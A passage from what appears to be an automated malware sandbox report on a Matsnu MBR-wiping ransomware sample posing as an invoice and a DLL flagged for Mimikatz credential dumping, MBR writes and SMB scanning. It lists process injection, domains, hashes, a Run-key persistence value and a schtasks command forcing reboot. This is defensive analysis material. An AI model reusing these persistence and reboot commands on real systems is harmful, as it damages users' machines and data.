Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\blwkxyjx = "C:\\Users\\Admin\\AppData\\Roaming\\Sbyhclwfz\\ykyrpclxyjx.exe" C:\Windows\SysWOW64\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2092 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2092 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2092 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2092 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2092 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2092 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2092 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2092 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 1360 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 1360 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 1360 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 1360 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 1360 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2856 wrote to memory of 2904 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2856 wrote to memory of 2904 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2856 wrote to memory of 2904 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2856 wrote to memory of 2904 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2904 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2904 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2904 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2904 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2904 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2904 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2904 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2904 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
PID 2768 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Windows\SysWOW64\svchost.exe
PID 2768 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Windows\SysWOW64\svchost.exe
PID 2768 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Windows\SysWOW64\svchost.exe
PID 2768 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Windows\SysWOW64\svchost.exe
PID 2768 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre C:\Windows\SysWOW64\svchost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre

C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre

C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre

C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre

C:\Windows\SysWOW64\svchost.exe

svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 nvufvwieg.com udp
US 8.8.8.8:53 zeouk-gt.com udp
US 8.8.8.8:53 mbqdczxrz.com udp
US 8.8.8.8:53 seodirect-proxy.com udp
US 8.8.8.8:53 pcv-onlines.com udp
US 8.8.8.8:53 pgcv-online.com udp
US 8.8.8.8:53 porkysolderxx.com udp
US 8.8.8.8:53 openwebspace-apo.com udp
US 8.8.8.8:53 nvufvwieg.com udp
US 8.8.8.8:53 zeouk-gt.com udp

Files

memory/1360-2-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1360-8-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1360-12-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1360-11-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1360-10-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1360-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1360-13-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1360-4-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1360-0-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2856-15-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2856-14-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2856-19-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre

MD5 1b2d2a4b97c7c2727d571bbf9376f54f
SHA1 1fc29938ec5c209ba900247d2919069b320d33b0
SHA256 7634433f8fcf4d13fb46d680802e48eeb160e0f51e228cae058436845976381e
SHA512 506fc96423e5e2e38078806591e09a6eb3cf924eb748af528f7315aa0b929890823798a3ef2a5809c14023c3ff8a3db36277bc90c7b099218422aafa4e0c2ee0

memory/2768-41-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2768-45-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2648-47-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2648-50-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2648-51-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2648-57-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240419-en

Max time kernel

1799s

Max time network

1800s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

Signatures

Mimikatz

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1C86.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLPERF.H C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CONTACT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\INFOMAIL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSMMS.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\eula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SHARING.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\ClearProtect.docx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSSMS.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECURE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1C86.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2092 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2092 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2092 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2092 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2092 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2092 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2092 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2240 wrote to memory of 2248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 2248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 2248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 2248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 2292 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\1C86.tmp
PID 2240 wrote to memory of 2292 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\1C86.tmp
PID 2240 wrote to memory of 2292 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\1C86.tmp
PID 2240 wrote to memory of 2292 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\1C86.tmp
PID 2248 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2248 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2248 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2248 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

C:\Users\Admin\AppData\Local\Temp\1C86.tmp

"C:\Users\Admin\AppData\Local\Temp\1C86.tmp" \\.\pipe\{F46F4EDF-B424-40C2-B1EB-5B93688047ED}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

Network

Country Destination Domain Proto
N/A 10.127.0.0:445 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.37:139 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.38:139 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.39:139 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.40:139 tcp
N/A 10.127.0.41:445 tcp
